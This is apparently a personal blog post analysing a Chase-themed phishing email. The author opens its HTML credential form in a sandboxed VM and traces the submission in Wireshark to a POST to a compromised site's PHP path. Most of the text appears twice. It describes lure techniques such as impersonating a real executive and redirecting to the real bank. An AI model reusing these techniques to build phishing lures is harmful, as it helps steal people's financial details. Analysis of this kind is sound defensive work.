Okay, so I recently received a phishing e-mail to my home address and wanted to see what happen if I followed it down the rabbit hole. This is always a fun exercise, because you never know what you're going to find or where you'll end up. Many times it leads to a Blackhole exploit kit or malicious iFrame, but this particular phishing e-mail was purely looking for personal information. A classic phishing example.
So here's the body of the phishing e-mail in all of it's glory. Not bad if you think about it, but it still has the tell tale signs of a phishing attack (the generic salutation, grammar, formatting errors, etc.). One area that I thought was amusing in this phishing e-mail is the reference to William Sheley. Mr. Sheley actually exists and does work for Chase as an SVP (thank you Linkedin). All-in-all this is a decently produced and researched phishing attempt, except for one thing. They attached an HTML document they want you to download and fill out (because all banks send you attachments like this). Ummm......No.
So okay, let's play the game. I have a virtual machine (VM) setup running Deep Freeze to purposely infect and play with these type of threats. Once you reboot the VM everything's installed back to original configuration using some sort of black magic. The software works freaking great and I highly recommended it.
The first thing I do is forward the phishing e-mail to a Gmail account I created to store phishing e-mails. Some people collect baseball cards, I collect phishing e-mails. Right off the bat Google notices there's some foul play going on and throws me this alert. Despite having a lack of privacy with Gmail, they're pretty darn good at catching spam/phishing.
Now for the fun part. After I open the HTML document I can see what they're trying to do. This is a simple way of collecting information from unsuspecting victims. Before opening the HTML file on my VM running Deep Freeze, I uploaded the HTML file to www.virustotal.com to verify that it didn't have a malicious reputation and started an instance of Wireshark to collect all the network traffic. Once the fake HTML form was up and all the inputs filled out, with fake data of course, I was able to review the packet capture to see where they were sending my faithfully entered credentials. Another interesting note about this form was that it was coded for user input validation on the fields. When I tried to enter "Shut Up" on the ATM/Debit or Credit Card Number it gave me an error that only numbers were allowed. Well, that was helpful.
As soon as I entered all the data in the appropriate fashion I submitted it like an unsuspecting user and was promptly directed to the real Chase home page below. This is done to make you think you actually completed something for their site and give you a false sense of security.
Now for the funner (is this a word) part!! Let's see exactly where all my "sensitive" information was being sent. I stopped my Wireshark capture and took a look at where this HTML form was forwarding to. Looking at the capture it becomes clear quite quickly what was going on. As soon as you submit the HTML form there's a DNS request looking for the "A" record of www.SITE-WILL-REMAIN-NAMELESS.com and a POST to /web/dmUserPlugin/js/complete.php. It turns out that all my very sensitive information was being sent in the clear to this compromised site.
Now wasn't that fun?! In my next post I'm going to infect my VM with a Blackhole Exploit Kit and show you some of the nasty things it does.
So here's the body of the phishing e-mail in all of it's glory. Not bad if you think about it, but it still has the tell tale signs of a phishing attack (the generic salutation, grammar, formatting errors, etc.). One area that I thought was amusing in this phishing e-mail is the reference to William Sheley. Mr. Sheley actually exists and does work for Chase as an SVP (thank you Linkedin). All-in-all this is a decently produced and researched phishing attempt, except for one thing. They attached an HTML document they want you to download and fill out (because all banks send you attachments like this). Ummm......No.
So okay, let's play the game. I have a virtual machine (VM) setup running Deep Freeze to purposely infect and play with these type of threats. Once you reboot the VM everything's installed back to original configuration using some sort of black magic. The software works freaking great and I highly recommended it.
The first thing I do is forward the phishing e-mail to a Gmail account I created to store phishing e-mails. Some people collect baseball cards, I collect phishing e-mails. Right off the bat Google notices there's some foul play going on and throws me this alert. Despite having a lack of privacy with Gmail, they're pretty darn good at catching spam/phishing.
Now for the fun part. After I open the HTML document I can see what they're trying to do. This is a simple way of collecting information from unsuspecting victims. Before opening the HTML file on my VM running Deep Freeze, I uploaded the HTML file to www.virustotal.com to verify that it didn't have a malicious reputation and started an instance of Wireshark to collect all the network traffic. Once the fake HTML form was up and all the inputs filled out, with fake data of course, I was able to review the packet capture to see where they were sending my faithfully entered credentials. Another interesting note about this form was that it was coded for user input validation on the fields. When I tried to enter "Shut Up" on the ATM/Debit or Credit Card Number it gave me an error that only numbers were allowed. Well, that was helpful.
As soon as I entered all the data in the appropriate fashion I submitted it like an unsuspecting user and was promptly directed to the real Chase home page below. This is done to make you think you actually completed something for their site and give you a false sense of security.
Now for the funner (is this a word) part!! Let's see exactly where all my "sensitive" information was being sent. I stopped my Wireshark capture and took a look at where this HTML form was forwarding to. Looking at the capture it becomes clear quite quickly what was going on. As soon as you submit the HTML form there's a DNS request looking for the "A" record of www.SITE-WILL-REMAIN-NAMELESS.com and a POST to /web/dmUserPlugin/js/complete.php. It turns out that all my very sensitive information was being sent in the clear to this compromised site.
Now wasn't that fun?! In my next post I'm going to infect my VM with a Blackhole Exploit Kit and show you some of the nasty things it does.
No comments:
Post a Comment